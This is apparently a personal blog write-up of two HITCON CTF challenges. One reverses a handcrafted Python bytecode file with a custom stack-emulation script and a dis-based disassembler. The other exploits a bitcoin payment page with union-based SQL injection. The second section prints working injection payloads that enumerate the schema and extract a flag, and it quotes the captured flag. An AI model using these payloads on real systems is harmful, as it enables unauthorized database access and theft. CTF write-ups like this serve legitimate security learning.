Blog

Hitcon ctf writeup

1.Handcrafted Pyc

We were give a python bytcode to reverse .. so i used uncompyl2(/6) but it ddin't worked out..the magic bytes was corrupted so to recover it ..


head -c 8 example.pyc > bytecode.pyc
cat bytecode >> bytecode.pyc

then decompiling it using uncompyl2 gave assembly code instead of py cod coz the entire program was written in assembly .. so we have to manually insect it
after read the python assembly doc i wrote a py code to extract the password ..


with open('string','r') as file_obj:
    	data=file_obj.readlines()

i=0
stack = []
print len(data)
for line in data :
   print "[+]In loop %d "% i 
   val=line[16:].split()
   if i==70:
     print stack
   if val[0] == "LOAD_CONST" :
           i=i+1
           dat=val[2].split('(')[1].split(')')[0]
           if dat != 'None' :
               dat=chr(int(dat))
               stack.append(dat)

   if val[0] == "ROT_TWO":
           temp=stack[-2]
           stack[-2]=stack[-1]
           stack[-1]=temp
   if val[0] == "BINARY_ADD":
           stack[-2]+=stack[-1]
           stack.pop(-1)

print stack

instead of using uncompyl2 we could also use dis module in python to get the assembly below code recursively disassmble the bytecode


import dis
import types
import marshal, zlib, base64

def get_code_object(obj, compilation_mode="exec"):
    if isinstance(obj, types.CodeType):
        return obj
    elif isinstance(obj, types.FrameType):
        return obj.f_code
    elif isinstance(obj, types.FunctionType):
        return obj.__code__
    elif isinstance(obj, str):
        try:
            return compile(obj, "", compilation_mode)
        except SyntaxError as error:
            print "error"
    else:
        raise TypeError("get_code_object() can not handle '%s' objects" %
                        (type(obj).__name__,))

def diss(obj, mode="exec", recurse=False):
    _visit(obj, dis.dis, mode, recurse)

def ssc(obj, mode="exec", recurse=False):
    _visit(obj, dis.show_code, mode, recurse)

def _visit(obj, visitor, mode="exec", recurse=False):
    obj = get_code_object(obj, mode)
    visitor(obj)
    if recurse:
        for constant in obj.co_consts:
            if type(constant) is type(obj):
                print()
                print('recursing into %r:' % (constant,))
                _visit(constant, visitor, mode, recurse)

codeobj=marshal.loads(zlib.decompress(base64.b64decode('eJyNVkt....')
diss(codeobj,"exec",True)

2. Bitcoin Writeup

We were given a page which generates a bitcoin and then asks to verify the payment
After some time i found tgat its vulnerable to error based sql injection ...



1NahfkZo5S6JrZxhR2jXWm3nhMBerQRoDU' AND 1=0 UNION ALL SELECT  database() -- '

database() = areyourich

114j4PJhqj6ZihacUx4CQnActDSm9tqpxd'  AND  1=0 union all select  table_name from information_schema.tables   where table_schema=database()  limit 1 -- '


table_name = flag1 

select column_name from information_schema.columns where table_name="flag1";

colum_name = flag 

114j4PJhqj6ZihacUx4CQnActDSm9tqpxd'  AND  1=0 union all select flag from areyourich.flag1 limit 1 -- '

gave the flag hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

But to extract 2 flag you have to inject a a bitcoin adress using select .. such that the account has 10000 bitcoins ..